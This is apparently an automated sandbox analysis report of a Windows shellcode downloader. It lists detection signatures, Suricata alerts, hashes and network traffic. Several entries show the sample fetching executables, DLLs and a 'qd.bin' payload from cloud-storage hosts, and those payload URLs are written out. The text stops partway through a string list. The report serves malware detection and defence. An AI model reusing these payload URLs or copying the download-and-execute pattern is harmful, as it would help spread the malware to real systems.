Edit tour

Windows Analysis Report
LisectAVT_2403002B_78.exe

Overview

General Information

Sample name:	LisectAVT_2403002B_78.exe
Analysis ID:	1481572
MD5:	89d61660f3e47a8a0f7ae37d5f8f03ed
SHA1:	434a0f545d0aaafafc1bf5366f98187356e37a3a
SHA256:	31c048f58d030f9c4ba84f5bf96ea182569b1d5468e41d9f3459b58a5df580b1
Tags:	exe
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

AI detected suspicious sample

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LisectAVT_2403002B_78.exe (PID: 4800 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_78.exe" MD5: 89D61660F3E47A8A0F7AE37D5F8F03ED)

conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 5956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1156 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 52.168.117.173

Timestamp:	2024-07-25T11:26:05.385881+0200
SID:	2028371
Source Port:	49725
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T11:26:28.058059+0200
SID:	2022930
Source Port:	443
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 43.152.64.193 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T11:25:42.841407+0200
SID:	2011803
Source Port:	443
Destination Port:	49714
Protocol:	TCP
Classtype:	Executable code was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T11:25:50.311485+0200
SID:	2022930
Source Port:	443
Destination Port:	49717
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002B_78.exe

Avira: detected

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: LisectAVT_2403002B_78.exe

Joe Sandbox ML: detected

Source: LisectAVT_2403002B_78.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 43.152.64.193:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.153.232.151:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.6:49723 version: TLS 1.2

Source: LisectAVT_2403002B_78.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: d:\build\ob\bora-21772623\cayman_glib\glib\src\build\win32\vs14\Release\Win32\bin\gthread-2.0.pdb source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr
Source:	Binary string: C:\Users\Administrator\Documents\Project2\Project2\Release\Project2.pdb source: libcurl[1].dll.0.dr, libcurl.dll.0.dr
Source:	Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source:	Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: I:\build\trunk_cn_9.0build\simulator\bin\dnmultiplayerex.pdb source: QT2[1].exe.0.dr, software.exe.0.dr
Source:	Binary string: wab.pdbGCTL source: LisectAVT_2403002B_78.exe
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: wab.pdb source: LisectAVT_2403002B_78.exe

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00ABDEF1 FindFirstFileExW,

0_2_00ABDEF1

Source: Joe Sandbox View

IP Address: 43.152.64.193 43.152.64.193

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /QT2.exe HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cximagecrt.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /libcurl.dll HTTP/1.1User-Agent: Mozilla/5.0Host: www80-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00AA31B0 Sleep,InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,fpos,fpos,fpos,VirtualAlloc,fpos,VirtualFree,

0_2_00AA31B0

Source: global traffic	HTTP traffic detected: GET /QT2.exe HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cximagecrt.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /libcurl.dll HTTP/1.1User-Agent: Mozilla/5.0Host: www80-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /qd.bin HTTP/1.1User-Agent: ShellcodeDownloaderHost: wwwbin-1323571107.cos.ap-guangzhou.myqcloud.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: www80-1323570959.cos.ap-singapore.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com

Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.di
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000097C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCert
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.0000000000984000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.0000000000984000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: software.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.0000000000984000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: LisectAVT_2403002B_78.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.0000000000984000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: QT2[1].exe.0.dr, software.exe.0.dr	String found in binary or memory: http://www.google-analytics.com/collect?v=1&t=event&tid=UA-156197647-3&cid=%s&ec=%s&ea=%s&el=%s&ev=1
Source: cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: http://www.ijg.org
Source: QT2[1].exe.0.dr, software.exe.0.dr	String found in binary or memory: https://HTTP/1.1
Source: QT2[1].exe.0.dr, software.exe.0.dr	String found in binary or memory: https://res.ldmnq.com/ld/leidianexmnq5mnq9https://res.ldmnq.com/download/release/ldinst9.0.exeldmnq9
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000097C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.0000000000989000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.0000000000989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/&#_
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlld
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldllTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dllo
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/$p
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/Tp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/dp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/j
Source: LisectAVT_2403002B_78.exe	String found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin
Source: LisectAVT_2403002B_78.exe	String found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binShellcodeDownloadererrorerrorerror
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.a
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqc
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322734496.0000000000966000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 